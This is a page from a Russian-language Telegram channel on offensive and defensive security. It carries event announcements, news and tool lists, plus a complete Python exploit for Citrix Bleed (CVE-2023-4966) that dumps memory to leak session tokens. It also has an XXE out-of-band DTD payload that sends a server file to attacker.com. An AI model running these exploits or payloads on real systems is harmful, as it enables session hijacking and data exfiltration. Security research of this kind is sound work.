Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Волосатый бублик
#cisco #cve #webshell #scanner #blueteam

[ Cisco IOS XE Device Scanner for CVE-2023-20198 & CVE-2023-20273 ]

Webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273. 

Important! This is not a POC for exploitation. This is a OSINT/Blue Team/Research tool.

Author: Shadow0ps

https://github.com/Shadow0ps/CVE-2023-20198-Scanner
👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Эксплойт для Citrix Bleed: Leaking Session Tokens
CVE-2023-4966

Пользуйтесь на здоровье 😉
Exploit:
#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
sys.exit(0)

hostname = args.target

if __name__ == "__main__":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")


Использование:
python exploit.py --target TARGET

💻 Github

➡️ Исследование

📹 YouTube PoC

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81
Forwarded from Standoff 365
This media is not supported in your browser
VIEW IN TELEGRAM
🤩 Как попасть на самый прекрасный митап этой осени — Standoff Talks, где лучшие профессионалы offensive и defensive security обменяются опытом с активным комьюнити?

Все просто: нужно быть матерым спецом по ИБ (уверены, в нашем канале только такие) и оставить заявку на сайте.

А 24–25 ноября встретиться в Кибердоме в рамках Moscow Hacking Week, чтобы прокачать свои скилы в багхантинге и пентесте, да и в целом круто провести время.

Не забудьте рассказать о себе в заявке и поторопитесь — количество мест ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🆒1
Похек
😉 BloodHound. Натаскиваем ищейку на поиск NTLM Relay #bloodhound #xakep Преж­де чем при­менять тех­нику NTLM Relay, необ­ходимо соб­рать информа­цию об иссле­дуемом объ­екте и выб­рать пер­вооче­ред­ные цели. Но как это сде­лать, если ата­куемая сеть нас­читыва­ет…
This media is not supported in your browser
VIEW IN TELEGRAM
🐧 Microsoft отказывается от NTLM в пользу Kerberos

Компания Microsoft анонсировала, что в будущем NTLM (New Technology LAN Manager) будет отключен в Windows 11, поскольку компания переходит на альтернативные методы аутентификации и повышения безопасности. Теперь основной упор будет сделан на усиление протокола Kerberos.

➡️ Новость на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥13
💊 Регистрация на Standoff 101 от Positive Technologies
Мероприятие для тех, кто хочет попасть в кибербез, но не знает, с чего начать

📌 Даты: 18–19 ноября

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
😵 Регистрация на Standoff Talks от Positive Technologies
Место для общения и обмена опытом профи и энтузиастов ИБ

📌 Даты: 24-25 ноября

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
This media is not supported in your browser
VIEW IN TELEGRAM
🍏 Эксплойт для CVE-2023-41993
Apple WebKit Arbitrary Code Execution

Затронутые версии: WebKitGTK и WPE WebKit до версии 2.42.1.
Импакт: Обработка веб-контента может привести к выполнению произвольного кода.

⚡️ Ссылка на PoC
Переходите по ссылке, только если вы уверены, что ваше яблочное устройство обновлено до последней версии или у вас Android.

1️⃣ Ссылка на эксплойт с объяснением принципа его эксплуатации

2️⃣ Бекап репозиторий

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
😎92👍2💔2
This media is not supported in your browser
VIEW IN TELEGRAM
Как провести свое первое security-исследование. Колонка Дениса Макрушина

На­чало учеб­ного года — это еще и начало сезона под­готов­ки дип­ломных работ. А это зна­чит, что у меня нас­тупа­ет сезон фор­мулиро­вания тем для сту­ден­тов факуль­тетов и кафедр информа­цион­ной безопас­ности в ведущих вузах. Я соб­рал свои рекомен­дации и лай­фха­ки для под­готов­ки тво­его пер­вого ИБ‑иссле­дова­ния.

От себя добавлю, что материал подойдёт всем, кто планирует или уже делает доклад/исследование на какую-то тему, не обязательно ИБ. В статье говориться про сам подход к ресерчам.
Отмечу сайт cfptime.org , где вы сможете отслеживать мировые конференции по ИБ, на которые вы сможете подавать на CFP (Call Of Papers).
А также ict2go для поиска мероприятий по различным направлениям и формату в России.

➡️ Статья на Xakep

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
9
Positive Technologies. Разговор об актуальных трендах кибербезопасности

Локация: Музей криптографии
213
Forwarded from #Arm1tage
Обход Out-of-Band XML с получением содержимого файла через Path Traversal

Новости с полей, потели сегодня с челами над одним проектом и пытались раскрутить Error-Based ХХЕ. Проблема:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;

Этот классический DTD код для отправки файла на attacker.com не отрабатывал по неизвестным причинам: реквеста на наш сервер небыло а в респонсе при любой модификации ХМЛ сервер выдавал одну и ту же ошибку.

В итоге вот этот уважаемый господин подсказал необычное решение использовать Path Traversal прямо в DTD коде:
<!ENTITY % file SYSTEM "file://../../../../../../etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;

И удивительно, но это сработало. В последствии стало ясно, что сервер не отправлял никаких реквестов на attacker.com, потому что не мог по каким-то причинам найти файл, если задать полный путь.


#xxe
🔥9👍4
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Инструменты для поиска проблем в докере 💻

На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.

Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.

💻 Docker
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)

💻 Docker in docker
Всегда запущен с привилегиями

💻 Kaniko (dind от Google), buildah, umoci, img
Всегда запущен с привилегиями

🔵 Инструменты Automatic Enumeration/Escape

🌐 deepce — Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE);
🌐 CDK — инструментарий для проникновения в контейнеры с открытым исходным кодом, предназначенный для обеспечения стабильной эксплуатации в различных тонких контейнерах без зависимости от ОС;
🌐 grype — cканер уязвимостей для образов контейнеров и файловых систем;
🌐 LinPEAS — да, у него есть замечательная функция работы с контейнерами;
🌐 dive — инструмент для изучения образа docker, содержимого слоев и поиска способов уменьшения размера образа Docker/OCI.

#opensource #devsecops #blueteam #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
10
С таких мемов надо сдувать пыль
🔥29😎2
👍38🌚9👾5👏1
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ СКУД. Поломай меня полностью.
Сегодня хочу с вами поделиться двуми прекрасными статьями про атаки на СКУД с помощью NFC и RFID.
#nfc #rfid #xakep #физика

NFC глазами хакера. Разбираем атаки на СКУД системы Mifare
Ког­да прос­тых иден­тифика­торов для кон­тро­ля дос­тупа ста­новит­ся недос­таточ­но, мно­гие дума­ют о внед­рении более совер­шенно­го решения — Mifare. Но так ли эти устрой­ства безопас­ны, как обе­щает про­изво­дитель? Поп­робу­ем разоб­рать­ся!

СКУД глазами хакера. Атакуем системы контроля доступа на основе RFID
Взлом элек­трон­ных тур­никетов на вхо­де в зда­ние — завет­ный хакер­ский флекс, который так любят показы­вать в кино. В этой статье я рас­ска­жу о сис­темах кон­тро­ля и управле­ния дос­тупом (СКУД) на осно­ве RFID, и мы вмес­те раз­берем­ся, нас­коль­ко прос­то под­делать самый рас­простра­нен­ный иден­тифика­тор EM4100.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥211
Media is too big
VIEW IN TELEGRAM
КиберПолигон в КиберДоме

Ждём Standoff 101, Talks, Hacks

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤‍🔥4🔥3
Админ делает посты для подписчиков
#halloween
❤‍🔥16🫡43🆒2